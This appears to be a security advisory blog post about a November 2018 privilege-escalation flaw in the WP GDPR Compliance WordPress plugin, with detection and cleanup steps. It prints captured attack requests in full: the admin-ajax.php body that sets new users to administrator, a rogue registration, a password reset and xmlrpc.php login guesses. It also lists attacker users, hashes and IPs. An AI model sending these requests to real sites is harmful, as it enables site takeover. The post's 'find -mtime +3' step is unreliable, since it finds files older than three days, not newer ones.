Table of Contents
Two days ago (on November 08 2018) nasty WP exploit has been identified inside the popular GDPR wordpress plugin , that leads to privilege escalation.
The plugin has more than 100 000 active installations.
All versions prior 1.4.3 (except 1.4.3) are vulnerable to the exploit.
What is the actual vulnerability ?
More information about the vulnerability itself could be found here:
https://wpvulndb.com/vulnerabilities/9144
How To Identify the attack ?
The actual attack happens in a several stages.
First attackers are trying to enable site registrations and set the default permissions for new users to be ‘Administrator’
This is done by POST request to your wp-admin/admin-ajax.php
The request looks like this (This is a real malicious request):
Host:XXXXXX.COM
Accept-Encoding:gzip
Content-Length:188
Content-Type:application/x-www-form-urlencoded
Referer:http://XXXXXX.COM/wp-login.php?action=rp User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
BODY: action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4
Second attackers are trying to register a new user
Most of the attacks in the wild are trying to register with the following 2 users:
t2trollherten
t3trollherten
Real post request looks like this:
Request_URI: http://XXXXXX.COM/wp-login.php?action=register
BODY:
redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register
Third (Optional) Trying to reset username password
We have seen some tries of attackers to reset the malicious user password.
The request looks like this:
Cookie: wordpress_test_cookie=WP+Cookie+check; path=/;wp-resetpass-464755d4cc9c2c0d7cc2b015eb2b7c0a=t2trollherten%3A76cnn4sryixU82wtCG9j; path=/wp-login.php; httponly;
URI: /wp-login.php?action=resetpass
BODY:
pass1=0rt8Ka7slborUi&pass1-text=0rt8Ka7slborUi&pass2=0rt8Ka7slborUi&rp_key=76cnn4sryixU82wtCG9j&wp-submit=Reset%2BPassword
At this moment the attacker will already have administrator user created.
What malicious actions attackers are making after exploiting the website ?
Different approaches have been reported, but most of the damage includes:
- Adding malicious administrator users to database
- Breaking websites by changing the “site_url” inside WP settings ,for doing black hat seo
- Adding malicious cronjobs
- Infecting currently existing files with shells
- Uploads of new web shells in the website document root
- Adding crontab crons , that reinfect the account
- Installing malicious wp plugins
Basically at this stage (when the attacker has access to the account), they could do all kind of harms.
How to clean the website after successful exploitation ?
!!! Before making any recovery on your website, make sure you have updated WP GDPR Compliance to it’s latest fixed version – 1.4.3 !!!
1) Restore everything from recent backup
This is the most effective action you could take to clean out your WP site.
We have traces of the attack starting from 08 of November, so it would be best if you are able to restore your wordpress files + database from date before 08 of November.
In case you don’t have any backup, you can try with some of the next cures.
2) Search for newly added users in your database and remove them
Inside your db->wp_users table , you could search for newly created users.
During now, we have seen the following 2 users to be actively injected in the database:
----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
| 20 | t2trollherten | $P$ByTG6qJi/eGVCRB2i.n/wS80Y967ng/ | t2trollherten | trollherten@mail.com | | 2018-11-08 13:43:38 | | 0 | t2trollherten |
| 21 | t3trollherten | $P$Bb7f2NV78UD2/nNpB6aKCStQnit99l1 | t3trollherten | t3trollherten@bk.ru | | 2018-11-08 15:58:44 | | 0 | t3trollherten |
+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
Update:
Another user that has been reported by Sucuri is “superuser” as as malicious one inserted into the database.
3) Search for newly created files in your hosting account
If you have multiple sites residing in the same account, you better search the whole account instead just your hacked website directory.
You could try searching with find for files added in the last few days:
# This will search for files modified in the last 3 days.
find . -type f -mtime +3
4) Revise your installed wordpress plugins for suspicious ones and delete them
Check if you have any suspicous newly installed WP plugins and remove them .
5) Check your system user cronjobs for suspicious ones
IP Addresses doing exploitation in the wild
Until know we have seen the following IP addresses exploiting the vulnerability in the wild:
109.234.39.250
109.234.37.214
46.39.65.176
195.123.213.91
UPDATE (13 Nov 2018)
Right now we are seeing a big wave of /xmlrpc.php requests ,that are trying to guess the passwords for the malicious users.
Attackers are trying to get control over already infected websites.
The requests looks like this:
URI: /xmlrpc.php
BODY:
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getProfile</methodName>
<params>
<param><value>9999</value></param>
<param><value>t2trollherten</value></param>
<param><value>0rt8Ka7slborUi</value></param>
</params>
</methodCall>
Useful external resources
https://wordpress.org/support/topic/important-update-to-1-4-3-immediately/